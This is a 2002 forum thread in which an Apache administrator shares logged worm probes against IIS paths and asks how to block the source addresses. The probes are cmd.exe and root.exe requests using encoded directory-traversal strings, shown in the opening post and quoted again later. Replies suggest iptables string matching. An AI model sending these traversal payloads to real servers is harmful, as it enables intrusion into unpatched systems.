Results 1 to 10 of 10

Thread: IIS virus attacks

  1. #1
    Mentor
    Join Date
    Jun 2001
    Posts
    1,672

    IIS virus attacks

    My apache log is full of entries like this:

    Code:
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:13 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 270 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:13 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 268 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:14 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 278 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:14 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 278 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:14 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:15 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:15 -0500]
    "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:15 -0500]
    "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:15 -0500]
    "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:16 -0500]
    "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:16 -0500]
    "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:16 -0500]
    "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:17 -0500]
    "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:17 -0500]
    "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:17 -0500]
    "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:18 -0500]
    "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 "-" "-"
    I take it it is one of those : IIS : viruses. I was wondering if there was a way of fighting it back. Can I automatically block out IP addresses that send out this crap?

  2. #2

    Re: IIS virus attacks

    If you are using a kernel newer than 2.4.9, you can use the "string" module in your iptables rules that blocks packets with strings like that.

    The only downside is that the worm will still establish a connection to your apache, it just won't be able to do anything after that. The connection will be forced to time out, which is kind of bad.

  3. #3
    Moderator
    Good Guru
    Compunuts's Avatar
    Join Date
    May 2001
    Location
    California
    Posts
    3,935

    Re: IIS virus attacks

    It's easier to just run a script with the cron and take out the log entires...... I've had plently of those ..... : :

  4. #4

    Re: IIS virus attacks


    My apache log is full of entries like this:

    Code:
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:13 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 270 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:13 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 268 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:14 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 278 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:14 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 278 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:14 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:15 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:15 -0500]
    "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:15 -0500]
    "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:15 -0500]
    "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:16 -0500]
    "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:16 -0500]
    "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:16 -0500]
    "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:17 -0500]
    "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:17 -0500]
    "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:17 -0500]
    "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:18 -0500]
    "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 "-" "-"
    I take it it is one of those : IIS : viruses. I was wondering if there was a way of fighting it back. Can I automatically block out IP addresses that send out this crap?
    Evertwa1 eh? thats everett Washington... I've been hit by a few script kiddies from that node...

  5. #5
    Moderator
    Good Guru
    Compunuts's Avatar
    Join Date
    May 2001
    Location
    California
    Posts
    3,935

    Re: IIS virus attacks

    This is the reason why bigger pipe can actually be dangerous .... Those clueless people bring down many legitimate uses of high speed net .....

  6. #6

    Re: IIS virus attacks

    Hey Cloverm,

    I just ran through my logs here and i am getting those exact same entries..... They seem to be pretty consistant and coming from a variety of sources. > >

  7. #7
    Senior Member
    Join Date
    May 2001
    Posts
    472

    Re: IIS virus attacks

    I *still* get the original Code Red stuff in my logs...

    Anyway, we know these machines are infected 'cause they are sending it out right? So just how does that exploit work anyway?

  8. #8
    Mentor
    Join Date
    Jun 2001
    Posts
    1,672

    Re: IIS virus attacks

    I *still* get the original Code Red stuff in my logs...

    Anyway, we know these machines are infected 'cause they are sending it out right? So just how does that exploit work anyway?
    Well it starts with a stupid, careless guy who uses M$ software and calls himself "Administrator".

  9. #9

    Re: IIS virus attacks

    Well it starts with a stupid, careless guy who uses M$ software and calls himself "Administrator".
    And with any luck at all, it ends with a stupid, careless guy who lives on the street because nobody will hire him.

  10. #10

    Re: IIS virus attacks




    And with any luck at all, it ends with a stupid, careless guy who lives on the street because nobody will hire him.
    maybe in a better future .. :-/

Similar Threads

  1. Protecting from Attacks?
    By Wildheart in forum Linux - General Topics
    Replies: 5
    Last Post: 01-27-2006, 06:24 AM
  2. Hackers: Businesses invite attacks
    By cloverm in forum Linux - Software, Applications & Programming
    Replies: 2
    Last Post: 10-27-2003, 10:11 PM
  3. SCO Attacks Red Hat and SuSE
    By Ashcrow in forum General Chat
    Replies: 11
    Last Post: 08-04-2003, 08:16 PM
  4. SCO attacks Linux users now ...
    By Compunuts in forum General Chat
    Replies: 3
    Last Post: 05-21-2003, 11:28 AM
  5. dos attacks
    By imported_LinuxGuy in forum Linux - Software, Applications & Programming
    Replies: 1
    Last Post: 06-20-2002, 05:49 AM

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •